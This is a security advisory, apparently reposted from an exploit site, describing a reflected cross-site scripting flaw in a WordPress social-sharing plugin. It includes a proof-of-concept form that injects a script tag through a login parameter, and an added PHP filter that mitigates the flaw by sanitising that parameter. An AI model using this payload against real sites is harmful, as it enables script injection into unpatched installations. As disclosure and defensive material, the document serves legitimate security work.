Tuesday, 4 August 2015

Full Title: WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting Vulnerability
Date Added: 04-08-2015
Category: web applications
Platform: php
Risk: Security Risk Low

Title: WordPress '1-click Retweet/Share/Like' Plugin
Version: 5.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download:
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ
 
## Vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS.
 
PoC:
Submit the following request (no need to log in first):
<form method="POST" action="[URL]/wp-login.php">
<input type="text" name="lacandsnw_networkpub_key" value=""><script>alert(1)</script>"><br />
<input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
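
With no fix available, one mitigation is to clean the parameter before the plugin reads it. The following is an added example, not code from the advisory or the plugin: a WordPress must-use plugin that reduces `lacandsnw_networkpub_key` to a conservative character set. The file path, the `vp_` names and the assumption that a legitimate key is a short alphanumeric token are illustrative.

```php
<?php
// Added example, not the plugin's code: a virtual patch written as a WordPress
// must-use plugin (hypothetical path: wp-content/mu-plugins/lacandsnw-key-filter.php).
// MU plugins load before regular plugins, so the value is cleaned first.

const VP_PARAM = 'lacandsnw_networkpub_key'; // parameter named in the PoC

// Assumption: a legitimate key is a short alphanumeric token. Quotes, angle
// brackets and whitespace are dropped, so a reflected value can no longer
// close an attribute or open a tag.
function vp_clean_key($raw)
{
    if (!is_string($raw)) { // array input such as key[]=x is rejected
        return '';
    }
    $clean = preg_replace('/[^A-Za-z0-9_-]/', '', $raw);
    return substr((string) $clean, 0, 128);
}

// Clean the parameter in one request array; returns true if it was changed.
function vp_filter_request(array &$bag)
{
    if (!array_key_exists(VP_PARAM, $bag)) {
        return false;
    }
    $before = $bag[VP_PARAM];
    $bag[VP_PARAM] = vp_clean_key($before);
    return $bag[VP_PARAM] !== $before;
}

// Apply to every request array the plugin could read the value from.
$vp_changed = vp_filter_request($_GET);
$vp_changed = vp_filter_request($_POST) || $vp_changed;
$vp_changed = vp_filter_request($_REQUEST) || $vp_changed;
if ($vp_changed) {
    // Leave a trace for monitoring; error_log() writes to the PHP error log.
    $client = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'cli';
    error_log(VP_PARAM . ' rewritten for client ' . $client);
}

// Constructed sample, printed only when the file is run directly with the PHP CLI.
if (PHP_SAPI === 'cli' && !defined('ABSPATH')) {
    $sample = array(VP_PARAM => '"><script>alert(1)</script>');
    vp_filter_request($sample);
    echo $sample[VP_PARAM], "\n";
}
```

Escaping the value where the plugin writes it into the page remains the actual fix; this filter only narrows what reaches that code.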
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
 
# 0day.today [2015-08-04]
# fb.com/inj3ct0rs and twitter.com/inj3ct0r